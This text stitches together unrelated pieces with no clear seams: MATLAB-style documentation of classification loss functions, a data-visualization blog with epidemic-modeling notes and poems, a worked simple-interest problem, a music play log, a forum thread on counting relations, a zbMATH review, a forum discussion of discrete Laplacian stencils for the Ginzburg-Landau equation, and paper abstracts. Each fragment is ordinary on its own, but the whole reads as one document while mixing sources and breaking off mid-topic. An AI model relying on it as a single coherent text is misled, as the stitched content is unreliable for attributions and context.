• f(Xj) is the length K vector of class scores for observation j of the predictor data X. The order of the scores corresponds to the order of the classes in the ClassNames property of the input model.
• mj = yj*f(Xj). Therefore, mj is the scalar classification score that the model predicts for the true, observed class.
• The weight for observation j is wj. The software normalizes the observation weights so that they sum to the corresponding prior class probability stored in the Prior property. Therefore,
$\sum _{j=1}^{n}{w}_{j}=1.$
Given this scenario, the following list describes the supported loss functions that you can specify by using the LossFun name-value argument.
• Binomial deviance ('binodeviance'): $L=\sum _{j=1}^{n}{w}_{j}\mathrm{log}\left\{1+\mathrm{exp}\left[-2{m}_{j}\right]\right\}.$
• Observed misclassification cost ('classifcost'): $L=\sum _{j=1}^{n}{w}_{j}{c}_{{y}_{j}{\stackrel{^}{y}}_{j}},$ where ${\stackrel{^}{y}}_{j}$ is the class label corresponding to the class with the maximal score, and ${c}_{{y}_{j}{\stackrel{^}{y}}_{j}}$ is the user-specified cost of classifying an observation into class ${\stackrel{^}{y}}_{j}$ when its true class is yj.
• Misclassified rate in decimal ('classiferror'): $L=\sum _{j=1}^{n}{w}_{j}I\left\{{\stackrel{^}{y}}_{j}\ne {y}_{j}\right\},$ where I{·} is the indicator function.
• Cross-entropy loss ('crossentropy'): appropriate only for neural network models. The weighted cross-entropy loss is $L=-\sum _{j=1}^{n}\frac{{\stackrel{˜}{w}}_{j}\mathrm{log}\left({m}_{j}\right)}{Kn},$ where the weights ${\stackrel{˜}{w}}_{j}$ are normalized to sum to n instead of 1.
• Exponential loss ('exponential'): $L=\sum _{j=1}^{n}{w}_{j}\mathrm{exp}\left(-{m}_{j}\right).$
• Hinge loss ('hinge'): $L=\sum _{j=1}^{n}{w}_{j}\mathrm{max}\left\{0,1-{m}_{j}\right\}.$
• Logit loss ('logit'): $L=\sum _{j=1}^{n}{w}_{j}\mathrm{log}\left(1+\mathrm{exp}\left(-{m}_{j}\right)\right).$
• Minimal expected misclassification cost ('mincost'): appropriate only if classification scores are posterior probabilities. The software computes the weighted minimal expected classification cost using this procedure for observations j = 1,...,n.
1. Estimate the expected misclassification cost of classifying the observation Xj into the class k: ${\gamma }_{jk}={\left(f{\left({X}_{j}\right)}^{\prime }C\right)}_{k}.$ Here f(Xj) is the column vector of class posterior probabilities for the observation Xj, and C is the cost matrix stored in the Cost property of the model.
2. For observation j, predict the class label corresponding to the minimal expected misclassification cost: ${\stackrel{^}{y}}_{j}=\underset{k=1,...,K}{\text{argmin}}{\gamma }_{jk}.$
3. Using C, identify the cost incurred (cj) for making the prediction.
The weighted average of the minimal expected misclassification cost loss is $L=\sum _{j=1}^{n}{w}_{j}{c}_{j}.$
• Quadratic loss ('quadratic'): $L=\sum _{j=1}^{n}{w}_{j}{\left(1-{m}_{j}\right)}^{2}.$
If you use the default cost matrix (whose element value is 0 for correct classification and 1 for incorrect classification), then the loss values for 'classifcost', 'classiferror', and 'mincost' are identical. For a model with a nondefault cost matrix, the 'classifcost' loss is equivalent to the 'mincost' loss most of the time. These losses can be different if prediction into the class with maximal posterior probability is different from prediction into the class with minimal expected cost. Note that 'mincost' is appropriate only if classification scores are posterior probabilities.
This figure compares the loss functions (except 'classifcost', 'crossentropy', and 'mincost') over the score m for one observation. Some functions are normalized to pass through the point (0,1).
True Misclassification Cost
Two costs are associated with KNN classification: the true misclassification cost per class and the expected misclassification cost per observation.
You can set the true misclassification cost per class by using the 'Cost' name-value pair argument when you run fitcknn. The value Cost(i,j) is the cost of classifying an observation into class j if its true class is i. By default, Cost(i,j) = 1 if i ~= j, and Cost(i,j) = 0 if i = j. In other words, the cost is 0 for correct classification and 1 for incorrect classification.
Expected Cost
The third output of predict is the expected misclassification cost per observation.
Suppose you have Nobs observations that you want to classify with a trained classifier mdl, and you have K classes. You place the observations into a matrix Xnew with one observation per row. The command
[label,score,cost] = predict(mdl,Xnew)
returns a matrix cost of size Nobs-by-K, among other outputs. Each row of the cost matrix contains the expected (average) cost of classifying the observation into each of the K classes. cost(n,j) is
$\sum _{i=1}^{K}\stackrel{^}{P}\left(i|Xnew\left(n\right)\right)C\left(j|i\right),$
where
• K is the number of classes.
• $\stackrel{^}{P}\left(i|Xnew\left(n\right)\right)$ is the posterior probability of class i for observation Xnew(n).
• $C\left(j|i\right)$ is the true misclassification cost of classifying an observation as j when its true class is i.
Version History
Introduced in R2012a
|
|
Tango is a sad thought that is danced.
# information graphics: worthwhile
The Outbreak Poems — artistic emissions in a pandemic
# Visual Design Principles—Communicating Effectively
This talk happened on Thursday, Mar 21st 2013 at VIZBI 2013 at the Broad Institute in Boston.
How often people speak of art and science as though they were two entirely different things, with no interconnection. An artist is emotional, they think, and uses only his intuition; he sees all at once and has no need of reason. A scientist is cold, they think, and uses only his reason; he argues carefully step by step, and needs no imagination. That is all wrong. The true artist is quite rational as well as imaginative and knows what he is doing; if he does not, his art suffers. The true scientist is quite imaginative as well as rational, and sometimes leaps to solutions where reason can follow only slowly; if he does not, his science suffers. —Isaac Asimov (The Roving Mind)
For more visualization and design resources, see my VIZBI 2012 tutorials, Nature Methods Points of View column, and rant about colors.
Do not allow encoding or other design choices to hijack your message. Each element on the page must meaningfully contribute to your figure.
## presentation video
The video will be posted at vizbi.org.
## presentation slides
Slides are available as PDF and keynote (zipped).
A poet is, after all, a sort of scientist, but engaged in a qualitative science in which nothing is measurable. He lives with data that cannot be numbered, and his experiments can be done only once. The information in a poem is, by definition, not reproducible. He becomes an equivalent of scientist, in the act of examining and sorting the things popping in [to his head], finding the marks of remote similarity, points of distant relationship, tiny irregularities that indicate that this one is really the same as that one over there only more important. Gauging the fit, he can meticulously place pieces of the universe together, in geometric configurations that are as beautiful and balanced as crystals. —Lewis Thomas (The Medusa and the Snail: More Notes of a Biology Watcher)
## breakout session—making good figures
Sketch notes by the inimitable Francis Rowland from our breakout group. The question was: what do you need to make good figures? (PDF)
## small, medium and big data visualization
If you're asking how to visualize big data, first make sure you're doing a good job on small and medium data. Each scale requires good design.
Do not expect to use one way to tell many stories.
Also consider that there is a very large number of combinations of data sets, hypotheses and possible patterns. Because of this, you cannot expect to use one way to tell many stories. There is no Holy Grail of big data visualization. But there are many good questions to ask and practices to follow that make up a process which can help you get there.
Medium data visualization. This is what happens when you show the data (a strategy that works for small data), instead of explaining it. Yup, we need to work on this too. (A) Qi X et al. J Biotech 144:43 (2012) (Saturation-Mutagenesis in Two Positions Distant from Active Site of a Klebsiella pneumoniae Glycerol Dehydratase Identifies Some Highly Active Mutants) (B) Alekseyev, M.A. et al. Genome Res 19:943 (2009) (Breakpoint graphs and ancestral genome reconstructions)
Big data visualization. Yes, data sets are growing, but our visual and cognitive abilities are not. There are many data sets, each requiring its own approach. You cannot use one way to tell many stories. Lewis SN et al. PLoS ONE 6:e27175 (2011) (Prediction of Disease and Phenotype Associations from Genome-Wide Association Studies)
# Virus Mutations Reveal How COVID-19 Really Spread
Mon 01-06-2020
Genetic sequences of the coronavirus tell story of when the virus arrived in each country and where it came from.
Our graphic in Scientific American's Graphic Science section in the June 2020 issue shows a phylogenetic tree based on a snapshot of the data model from Nextstrain as of 31 March 2020.
Virus Mutations Reveal How COVID-19 Really Spread. Text by Mark Fischetti (Senior Editor), art direction by Jen Christiansen (Senior Graphics Editor), source: Nextstrain (enabled by data from GISAID).
# Cover of Nature Cancer April 2020
Mon 27-04-2020
Our design on the cover of Nature Cancer's April 2020 issue shows mutation spectra of patients from the POG570 cohort of 570 individuals with advanced metastatic cancer.
Each ellipse system represents the mutation spectrum of an individual patient. Individual ellipses in the system correspond to the number of base changes in a given class and are layered by mutation count. Ellipse angle is controlled by the proportion of mutations in a class within the sample and its size is determined by a sigmoid mapping of mutation count scaled within the layer. The opacity of each system represents the duration since the diagnosis of advanced disease. (read more)
The cover design accompanies our report in the issue Pleasance, E., Titmuss, E., Williamson, L. et al. (2020) Pan-cancer analysis of advanced patient tumors reveals interactions between therapy and genomic landscapes. Nat Cancer 1:452–468.
# Modeling infectious epidemics
Wed 06-05-2020
Every day sadder and sadder news of its increase. In the City died this week 7496; and of them, 6102 of the plague. But it is feared that the true number of the dead this week is near 10,000 ....
—Samuel Pepys, 1665
This month, we begin a series of columns on epidemiological models. We start with the basic SIR model, which models the spread of an infection between three groups in a population: susceptible, infected and recovered.
Nature Methods Points of Significance column: Modeling infectious epidemics. (read)
We discuss conditions under which an outbreak occurs, estimates of spread characteristics and the effects that mitigation can play on disease trajectories. We show the trends that arise when "flattening the curve" by decreasing $R_0$.
Nature Methods Points of Significance column: Modeling infectious epidemics. (read)
This column has an interactive supplemental component that allows you to explore how the model curves change with parameters such as infectious period, basic reproduction number and vaccination level.
Nature Methods Points of Significance column: Modeling infectious epidemics. (Interactive supplemental materials)
Bjørnstad, O.N., Shea, K., Krzywinski, M. & Altman, N. (2020) Points of significance: Modeling infectious epidemics. Nature Methods 17:455–456.
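For readers who want to experiment beyond the interactive supplement, a minimal Euler-integration sketch of the SIR equations (the β and γ values are illustrative, not those used in the column):

```python
beta, gamma = 0.3, 0.1          # transmission and recovery rates (R0 = 3)
S, I, R = 0.999, 0.001, 0.0     # population fractions
dt, steps = 0.1, 2000
for _ in range(steps):
    dS = -beta * S * I          # susceptibles infected per unit time
    dI = beta * S * I - gamma * I
    dR = gamma * I
    S, I, R = S + dt * dS, I + dt * dI, R + dt * dR
print(S, I, R)                  # lowering beta "flattens the curve"
```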
# The Outbreak Poems
Sat 04-04-2020
I'm writing poetry daily to put my feelings into words more often during the COVID-19 outbreak.
That moment when you know a moment.
Branch to branch, flit, look everywhere, chirp.
Memory, scent of thought fleeting.
Distant pasts all ways in plural form.
|
|
# A Sum Of Money Invested At 8% Per Annum For Simple Interest Amounts To Rs 12122 In 2 Years. What Will It Amount To In 2 Years 8 Months At 9% Rate Of Interest?
Given:
Amount = Rs 12122
Time period, t = 2 years
Rate of interest, r = 8%
Amount = Principal + Interest
$$\Rightarrow 12122 = P + \frac{PTR}{100}$$ $$\Rightarrow 12122 = \frac{100P + PTR}{100}$$ $$\Rightarrow 12122 = \frac{P(100 + TR)}{100}$$ $$\Rightarrow 12122 = \frac{P(100 + 2 \times 8)}{100}$$ $$\Rightarrow 12122 = \frac{116P}{100}$$ $$\Rightarrow P = 12122 \times \frac{100}{116}$$
Therefore, Principal (P) = Rs 10450.
Now find the amount for two years eight months (32 months) at the rate of interest r = 9% per annum.
Amount = Principal + Interest
$$\Rightarrow A = P + \frac{PTR}{100}$$
Since two years eight months (32 months) $$= \frac{8}{3}$$ years: $$\Rightarrow A = 10450 + \frac{10450 \times \frac{8}{3} \times 9}{100}$$ $$\Rightarrow A = 10450 + \frac{250800}{100}$$ $$\Rightarrow A = 10450 + 2508$$ $$\Rightarrow A = 12958$$
Therefore, Amount, A = Rs.12958
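A quick sanity check of the arithmetic in Python:

```python
amount_2y, r1, t1 = 12122, 8, 2
P = amount_2y * 100 / (100 + r1 * t1)   # principal: 10450.0
r2, t2 = 9, 8 / 3                       # 2 years 8 months = 8/3 years
A = P + P * t2 * r2 / 100               # 10450 + 2508 = 12958.0
print(P, A)
```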
Explore more such questions and answers at BYJU’S.
|
|
# Height of a regular hexagonal prism Calculator
## Calculates the height of a regular hexagonal prism given the volume and base edge length.
Inputs: base edge length a, volume V. Output: height h.
Height of a regular hexagonal prism
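The formula behind the calculator: a regular hexagon with edge $a$ has area $\frac{3\sqrt{3}}{2}a^{2}$, so $V = \frac{3\sqrt{3}}{2}a^{2}h$ and $h = \frac{2V}{3\sqrt{3}\,a^{2}}$. A one-function sketch of the same computation (variable names are mine):

```python
from math import sqrt

def hex_prism_height(a, V):
    """Height of a regular hexagonal prism with base edge a and volume V."""
    base_area = 3 * sqrt(3) / 2 * a * a   # area of the regular hexagon
    return V / base_area

print(hex_prism_height(2.0, 50.0))   # ~4.811
```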
|
|
Library
Music » Fever Ray »
27 played tracks | Go to track page
Tracks (27)
Track Album Length Date
If I Had a Heart 3:49 29 mar 2012, 15:15
If I Had a Heart 3:49 22 mar 2012, 15:02
If I Had a Heart 3:49 17 mar 2012, 20:20
If I Had a Heart 3:49 17 mar 2012, 19:31
If I Had a Heart 3:49 17 mar 2012, 18:43
If I Had a Heart 3:49 17 mar 2012, 17:55
If I Had a Heart 3:49 17 mar 2012, 17:07
If I Had a Heart 3:49 13 mar 2012, 17:28
If I Had a Heart 3:49 11 mar 2012, 15:39
If I Had a Heart 3:49 11 mar 2012, 13:03
If I Had a Heart 3:49 11 mar 2012, 12:15
If I Had a Heart 3:49 11 mar 2012, 10:57
If I Had a Heart 3:49 11 mar 2012, 10:53
If I Had a Heart 3:49 8 mar 2012, 21:54
If I Had a Heart 3:49 8 mar 2012, 21:50
If I Had a Heart 3:49 8 mar 2012, 21:46
If I Had a Heart 3:49 8 mar 2012, 21:42
If I Had a Heart 3:49 8 mar 2012, 21:38
If I Had a Heart 3:49 8 mar 2012, 21:35
If I Had a Heart 3:49 8 mar 2012, 21:31
If I Had a Heart 3:49 8 mar 2012, 21:27
If I Had a Heart 3:49 8 mar 2012, 16:38
If I Had a Heart 3:49 8 mar 2012, 16:34
If I Had a Heart 3:49 8 mar 2012, 16:30
If I Had a Heart 3:49 21 sep 2011, 10:40
If I Had a Heart 3:49 21 sep 2011, 09:18
If I Had a Heart 3:49 20 sep 2011, 20:04
|
|
# Math Help - Relations Question
1. ## Relations Question
Let A be the set {a, b, c, d, e, 1, 2, 3, 4, 5, x, y, z, w}
How many different reflexive relations are there and how many different symmetric relations are there? I know the total would be 2^196 because of the power set rule but how can I figure out how many reflexive and symmetric relations there are?
2. Originally Posted by dre
Let A be the set {a, b, c, d, e, 1, 2, 3, 4, 5, x, y, z, w}
How many different reflexive relations are there and how many different symmetric relations are there?
The set of pairs $\Delta _A = \left\{ {\left( {\alpha ,\alpha } \right):\alpha \in A} \right\}$ is known as the diagonal of the table of ordered pairs.
There are $14^2$ pairs in that table, and $\left| {\Delta _A } \right| = 14$.
Therefore there are $14^2-14$ off diagonal pairs.
Any reflexive relation on $A$ must contain ${\Delta _A }$.
So any reflexive relation is the union of ${\Delta _A }$ with any subset of off diagonal pairs.
How many of those are there?
Any symmetric relation on $A$, $\mathcal{S}$, has the property that $\mathcal{S}=\mathcal{S}^{-1}$.
There are $\frac{(14)(15)}{2}$ pairs either on the diagonal or above it.
Any subset of those pairs corresponds to a symmetric relation.
Just take that subset and unite it with its inverse.
How many are there?
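(For the record: with $|A| = 14$ these counts come to $2^{14^2-14} = 2^{182}$ reflexive relations and $2^{14\cdot 15/2} = 2^{105}$ symmetric relations.)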
3. Originally Posted by Plato
The set of pairs $\Delta _A = \left\{ {\left( {\alpha ,\alpha } \right):\alpha \in A} \right\}$ is known as the diagonal of the table of ordered pairs.
There are $14^2$ pairs in that table, and $\left| {\Delta _A } \right| = 14$.
Therefore there are $14^2-14$ off diagonal pairs.
Any reflexive relation on $A$ must contain ${\Delta _A }$.
So any reflexive relation is the union of ${\Delta _A }$ with any subset of off diagonal pairs.
How many of those are there?
Any symmetric relation on $A$, $\mathcal{S}$, has the property that $\mathcal{S}=\mathcal{S}^{-1}$.
There are $\frac{(14)(15)}{2}$ pairs either on the diagonal or above it.
Any subset of those pairs corresponds to a symmetric relation.
Just take that subset and unite it with its inverse.
How many are there?
Thank you for this explanation, but I am still confused about something in ROSEN: I understand that the number of subsets of a set A with n elements is $2^n$. I can see that the diagonal of the Cartesian product will contain n elements and that all other elements will total $n^2 - n$. But I don't see why the number of reflexive relations equals $2^q$ where $q = n^2 - n$. Why isn't the number of reflexive relations just equal to $2^r$ where $r = n^2$?
Thanks
4. Originally Posted by oldguynewstudent
Thank you for this explanation, but I am still confused about something in ROSEN: I understand that the number of subsets from A with n elements is $2^n$, I can see that the diagonal of the cartesian product will contain n elements and that all other elements will total $n^2$ - n. But I don't see why the number of reflexive relations equal $2^q$ where q = $n^2$ - n ? Why isn't the number of reflexive relations just equal to $2^r$ where r = $n^2$?
If you will give me the exact reference in Rosen's book I will look at it.
As for your other concern, if $|A|=n$ then how many subsets of $A\times A$ contain $\Delta_A$?
Do you understand that $\left|(A\times A)\setminus \Delta_A\right|=n^2-n?$
How many subsets of $A\times A\setminus \Delta_A$ are there?
Uniting any of those with $\Delta_A$ we get a reflexive relation on $A$
5. ## I think I get it now
Originally Posted by Plato
If you will give me the exact reference in Rosen's book I will look at it.
As for your other concern, if $|A|=n$ then how many subsets of $A\times A$ contain $\Delta_A$?
Do you understand that $\left|(A\times A)\setminus \Delta_A\right|=n^2-n?$
How many subsets of $A\times A\setminus \Delta_A$ are there?
Uniting any of those with $\Delta_A$ we get a reflexive relation on $A$
Thanks for your patience. We skipped the combinatorics chapters. The reference is on p. 525 of the 6th edition, example 16. So because there are n members on the diagonal, each of the n rows has n - 1 off-diagonal entries, giving n(n - 1) free pairs by the product rule. Then we raise 2 to that power to get the number of reflexive relations.
I still have to think it over further to solidify the concept. But at least now I can follow the reasoning.
Happy Holidays!
|
|
# zbMATH — the first resource for mathematics
Enumerative geometry for complex geodesics on quasi-hyperbolic 4-spaces with cusps. (English) Zbl 1053.14060
Mladenov, Ivaïlo M. (ed.) et al., Proceedings of the 4th international conference on geometry, integrability and quantization, Sts. Constantine and Elena, Bulgaria, June 6–15, 2002. Sofia: Coral Press Scientific Publishing (ISBN 954-90618-4-1/pbk). 42-87 (2003).
An orbital surface $\hat{\mathbb{X}}=(\hat{X},\hat{B}^{1})$ is a complex normal algebraic surface $\hat{X}$ with at most quotient and cusp singularities together with an orbital Weil divisor $\hat{B}^{1}$. Orbital functionals can be defined simultaneously for each commensurability class of orbital surfaces, and they are realized on infinite-dimensional orbital divisor spaces spanned by orbital curves on an orbital surface. In this paper the author finds infinitely many orbital functionals on each commensurability class of orbital Picard surfaces, which are real 4-spaces with cusps and negative constant Kähler-Einstein metric degenerated along an orbital cycle. For a suitable Heegner sequence $(\int h_{N})$ of such functionals he studies the corresponding formal orbital $q$-series $\sum_{N=0}^{\infty}(\int h_{N})\,q^{N}$. After the substitution $q=e^{2\pi i\tau}$ and the application to arithmetic orbital curves $\hat{\mathbb{Y}}$ on a fixed Picard surface class, the author proves that the series $\sum_{N=0}^{\infty}(\int_{\hat{\mathbb{Y}}}h_{N})\,e^{2\pi iN\tau}$ defines modular forms of well-determined fixed weight, level and Nebentypus. The proof uses the notion of orbital heights and Mumford-Fulton’s rational intersection theory on singular surfaces in the Riemann-Roch-Hirzebruch style.
##### MSC:
14N20 Configurations and arrangements of linear subspaces
11F55 Groups and their modular and automorphic forms (several variables)
##### Keywords:
orbital curves; orbital surfaces; modular forms
|
|
# Numerical Solution for Complex PDE (Ginzburg-Landau Eqn.)
I can't seem to figure out how to edit the post :/. Here is a pic of the error I get:
http://tinypic.com/r/25tjkm1/9
Strum, without knowing the exact 9-point stencil you used I tried to replicate the plot you produced (in Matlab I assume?). Apparently, there is no standard for the 9-point kernel although there is some consensus on the 5-point kernel. Different formulations of the finite difference formulae will yield differing kernels. So when I use a 9 point kernel, I obtain the following for the same domain and $\Delta x = \Delta y = h = 0.1$
It seems like I get a very small $|\epsilon|^2$. By the way, the reason I am insisting on using convolution is purely computational: it can be done in hardware (i.e. on a GPU). It seems like we both have comparable rates. The 5-point stencil yields the following result:
Notice that there are some artefacts that appear about one of the "color rings" in the last error plot. Were you using a method other than convolution?
Twigg
Gold Member
First off, I want to say thanks to Johnny_Sparx for taking the time to make this a great thread. I've learned a lot from it and enjoyed reading every new post.
I needed to take some time to think about this whole thing. The convolution method I was working with has a spectral response. By this I mean the finite boundary extents should yield oscillations at the extents, and these are related to the spatial step size. When I initialize my array with uniformly random values (from the complex unit square with length less than or equal to one), relative to one another, these are all 2D step functions. For example, for an arbitrary array location (i,j) assume I have a random value of 1+0j. Adjacent to it, say at (i+1,j-1), there may be a value of 0+0j. This is a sharp discontinuity whose second derivative is quite large.
For a sufficiently large initialization array with values that are locally discontinuous the Laplacian can yield large values, especially the way I am iterating for the Runge-Kutta algorithm... repeatedly calling the Laplacian operator. I am just throwing ideas around... what do you think?
I may be missing something, but I don't see how the oscillations at the extents are related to the error in the Laplacian due to large differences divided by small step sizes. There is a way you could test to see if these differences are what's giving you the overflow. Go into your initialization code where you sample random points from the complex unit square and make the radius of the complex square a variable, not necessarily 1. For clarity, let's call the size of the complex square that the initial values are sampled from g, and let's call the stepsize h. Write a for loop to run your simulation for several values of g and h. My instinct would be to have it do orders of magnitude. For example, the loop would start with h = 1.0E-03 and g = 1.0E-03 and run your simulation, then do h = 1.0E-03 and g = 1.0E-02, etc., then h = 1.0E-3 and g = 1.0E3, then h = 1.0E-02 and g = 1.0E-03, etc etc. If you are right and the issue is entirely due to large differences in the Laplacian, then the overflow error will only depend on g/h. If you plot the overflow error over the gh-plane, the resulting surface plot should be independent of the radial coordinate and depend only on the angular coordinate (on average, at least, since the initialization is randomized). If that's not the case, I would venture to say that something else is up. This may take a lot of computing time.
I maybe should've asked a little earlier, but can you tell us what you're using as boundary conditions, and how you tell the kernel to behave on those boundaries? For example, on the edges are you using a 4-point stencil or is there some contribution from outside? I can't tell if the errors you're seeing are related to boundaries or not. Hopefully the above test helps narrow it down.
First off, I want to say thanks to Johnny_Sparx for taking the time to make this a great thread. I've learned a lot from it and enjoyed reading every new post.
Truth be known, in my personal circles, I have been talking about the direction both you and Strum have helped me with. I just posted, you both replied. And I too have been learning a lot of things. Lots of deep insight in this thread. Thought provoking stuff!
I may be missing something, but I don't see how the oscillations at the extents are related to the error in the Laplacian due to large differences divided by small step sizes.
My inspiration for saying this extends from the following idea:
Consider a unit step function $f(t)$ (i.e. the Heaviside function with a one-dimensional discontinuity). The 1D Laplacian of this function is essentially the second derivative $\frac{\partial^2}{\partial t^2}f(t)$. This is the doublet function, a double-sided unit impulse (FYI, the Kronecker delta function is a discrete version of the Dirac function, and the doublet is its derivative). In the frequency domain these impulses have an infinitely wideband spectrum (constant in the frequency domain). Discretely sampling an infinitely wideband signal essentially filters it. To me, derivatives at crisp boundaries create time-domain oscillations that are band-limited by the sampling frequency. That's why, when we look at simulations involving Laplacians or gradients over time, amplitude changes are typically initiated at sharp boundaries and have wave-like patterns.
I just wanted to express motivations for my comment, thanks for calling me to task for this. It helped me clarify my thoughts on the matter.
There is a way you could test to see if these differences are what's giving you the overflow. Go into your initialization code where you sample random points from the complex unit square and make the radius of the complex square a variable, not necessarily 1. For clarity, let's call the size of the complex square that the initial values are sampled from g, and let's call the stepsize h. Write a for loop to run your simulation for several values of g and h. My instinct would be to have it do orders of magnitude. For example, the loop would start with h = 1.0E-03 and g = 1.0E-03 and run your simulation, then do h = 1.0E-03 and g = 1.0E-02, etc., then h = 1.0E-3 and g = 1.0E3, then h = 1.0E-02 and g = 1.0E-03, etc etc. If you are right and the issue is entirely due to large differences in the Laplacian, then the overflow error will only depend on g/h. If you plot the overflow error over the gh-plane, the resulting surface plot should be independent of the radial coordinate and depend only on the angular coordinate (on average, at least, since the initialization is randomized). If that's not the case, I would venture to say that something else is up. This may take a lot of computing time.
This might take some time to do which I don't think I have. What I did do was to test the Laplacian I implemented with a function that did not vanish at the borders. In other words, I used the same function, but biased it by 1 and computed the Laplacian with 0 as fill values at the border. Essentially this forms a crisp edge. The function used was:$$f(x,y) = {{\rm e}^{-{x}^{2}-{y}^{2}}}+1$$ Note the last term. The analytic Laplacian was found to be:$$\nabla^2 f = -4\,{{\rm e}^{-{x}^{2}-{y}^{2}}}+4\,{x}^{2}{{\rm e}^{-{x}^{2}-{y}^{2}}}+4\,{y}^{2}{{\rm e}^{-{x}^{2}-{y}^{2}}}$$
The 9-point stencil was convolved over the discretized function ($-6 \leq x,y\leq 6, h=0.1$). The convolutional function was called with fill values of 0 at the boundaries. The result:
And look at those errors! 6 orders of magnitude greater than the previous test result I posted. It seems the convolutional method does not respect boundaries as expected. Next experiment. Convolution using a "wrap" at the end of both axes, ie, the domain is a torus. This continuous domain yields (for the same function):
And now look at the boundary. My conclusion seems to be converging to:
In computing a discrete Laplacian, it seems convolution with a 5/9-point stencil (or any other) works on continuous boundaries, not on discrete ones, regardless of what fill values you insert at the boundaries.
I maybe should've asked a little earlier, but can you tell us what you're using as boundary conditions, and how you tell the kernel to behave on those boundaries? For example, on the edges are you using a 4-point stencil or is there some contribution from outside? I can't tell if the errors you're seeing are related to boundaries or not. Hopefully the above test helps narrow it down.
At the boundary, I need for the order parameter to be zero, ie $\psi=0$ at the boundaries. What is the name of a method I can use that does not employ convolution to enforce these boundaries? I know we mentioned the use of sparse matrices... is there a name for this method so that I can look it up?
Were you using another method other than convolution?
I used a simple 5- or 9-point finite difference stencil.
Your result in #28 is to be expected, since you are differentiating a function given by ## f(x,y) = e^{-(x^2 + y^2)} + 1 ## in the interior and ## f(x,y) = 0 ## on the boundary. That will generate problems. This, however, is not the situation you will be in when doing your simulation, where the G-L field will find a natural solution with ## \psi = 0 ## on the boundary.
In computing a discrete Laplacian, it seems convolution with a 5/9-point stencil (or any other) works on continuous boundaries, not on discrete ones, regardless of what fill values you insert at the boundaries.
I am not entirely certain I understand what you are saying but I am suspecting it does not make sense. There is no problem specifying Dirichlet boundary conditions using all sorts of different numerical methods.
At the boundary, I need for the order parameter to be zero, ie ## \psi=0 ## at the boundaries. What is the name of a method I can use that does not employ convolution to enforce these boundaries? I know we mentioned the use of sparse matrices... is there a name for this method so that I can look it up?
Perhaps you should try to use a finite difference method. See for example these slides: http://people.sc.fsu.edu/~jpeterson/notes_fd.pdf . In order to enforce your boundary conditions, you extend the lattice with a boundary layer with a specific value (in your case ## 0 ##), which you do not update. This is shown on slide 16. On slide 18 the differentiation matrix for a finite difference method is shown. As you can see, it is sparse.
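A minimal NumPy sketch of that boundary-layer idea (the names and the 5-point stencil here are my own, not taken from the slides): store ψ with a one-cell ghost border held at 0 and differentiate only the interior.

```python
import numpy as np

h = 0.1
psi = np.zeros((102, 102), dtype=complex)   # 100x100 interior + ghost border
psi[1:-1, 1:-1] = np.random.rand(100, 100) + 1j * np.random.rand(100, 100)

def laplacian_interior(u, h):
    """5-point finite-difference Laplacian evaluated on the interior of u."""
    return (u[:-2, 1:-1] + u[2:, 1:-1] +
            u[1:-1, :-2] + u[1:-1, 2:] - 4.0 * u[1:-1, 1:-1]) / h**2

lap = laplacian_interior(psi, h)   # shape (100, 100)
# A time stepper updates psi[1:-1, 1:-1] only; the untouched ghost cells
# keep psi = 0 on the boundary (the Dirichlet condition).
```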
Twigg
Gold Member
Finite difference is the method I was thinking of. Specifically, a central-difference scheme for the Laplacian. The catch is that your problem is non-linear due to the ##|\psi|^{2} \psi## term. You will need to use Newton's method to get a solution, and that opens a new can of worms with convergence and validation. I've never tried this personally, but I know at least one piece of commercial software (COMSOL) that uses Newton's method to solve the matrix problems of finite element methods.
Is there a way to adapt your existing code to initialize the order parameter on the boundaries to 0 and then tell the convolutional kernel to act on everything but the outermost cells? That might make a lot more sense if you already have a method that works. For example, if your initial data was [0, 0, 0, 0; 0, 0.3+0.5i, 0.5-0.2i,0;0,0,0,0], then you would tell the convolutional kernel only to operate on the inner two entries and not act on the boundary zeros. Is that possible? Just a thought.
Finite difference is the method I was thinking of. Specifically, a central-difference scheme for the Laplacian. The catch is that your problem is non-linear due to the ##|\psi|^{2} \psi## term. You will need to use Newton's method to get a solution, and that opens a new can of worms with convergence and validation. I've never tried this personally, but I know at least one piece of commercial software (COMSOL) that uses Newton's method to solve the matrix problems of finite element methods.
Why would you think there is a problem with non-linear terms? I really can not see how this should pose a problem as long as he uses some explicit time integration scheme ( and even if he used an implicit I can not see why the difficulties would even be related to the finite difference method ).
Twigg
Gold Member
Why would you think there is a problem with non-linear terms? I really cannot see how this should pose a problem as long as he uses some explicit time integration scheme (and even if he used an implicit one, I cannot see why the difficulties would even be related to the finite difference method).
You're absolutely right, my mistake. I was thinking of a steady-state problem, which this is not.
|
|
# 59617
## Author(s):
2
Publication parameters
Conference paper
## Title:
σ-entropy Analysis of LTI Continuous-Time Systems with Stochastic External Disturbance in Time Domain
## ISBN/ISSN:
978-1-7281-9809-5
## DOI:
10.1109/ICSTCC50638.2020.9259630
## Conference:
• 24th International Conference on System Theory, Control and Computing (ICSTCC 2020)
## Source:
• Proceedings 2020 24th International Conference on System Theory, Control and Computing (ICSTCC 2020)
## City:
• New York, NY, USA
## Publisher:
• IEEE
## Year:
2020
## Pages:
184-189 https://ieeexplore.ieee.org/document/9259630
Abstract
This paper deals with the disturbance attenuation capabilities of continuous linear time-invariant systems with respect to stochastic input disturbances with bounded 2-norm or power norm (for generality called the N norm). The set of input disturbances is bounded by a scalar parameter σ, which is determined by an entropy integral and is called the σ-entropy. This set is connected with the system bandwidth at low frequencies. The σ-entropy norm of a continuous linear system can be defined as the supremum of the ratio between the N norms of the system's output and input signals. It characterizes the system gain with respect to the stochastic input disturbance. In the paper a state-space solution to the σ-entropy norm calculation is given.
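Schematically (notation assumed here for illustration; it is not taken verbatim from the paper), the norm described in the abstract is
$$\|F\|_{\sigma} \;=\; \sup_{w \,:\, S(w)\,\leqslant\,\sigma} \frac{\|z\|_{N}}{\|w\|_{N}},$$
where $w$ is the input disturbance, $z$ is the system output, and $S(w)$ is the entropy integral bounding the admissible disturbance set.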
## Citation:
Белов А.А., Бойченко В.А. σ-entropy Analysis of LTI Continuous-Time Systems with Stochastic External Disturbance in Time Domain // Proceedings 2020 24th International Conference on System Theory, Control and Computing (ICSTCC 2020). New York, NY, USA: IEEE, 2020. pp. 184-189. https://ieeexplore.ieee.org/document/9259630
|
|
舰船科学技术 (Ship Science and Technology), 2017, Vol. 39, Issue (2): 103-107
Back-stepping sliding mode control of ship dynamic positioning system based on extended state observer
JIN Yue, YU Meng-hong, YUAN Wei, FAN Ji-sheng
School of Electronic and Information, Jiangsu University of Science and Technology, Zhenjiang 212003, China
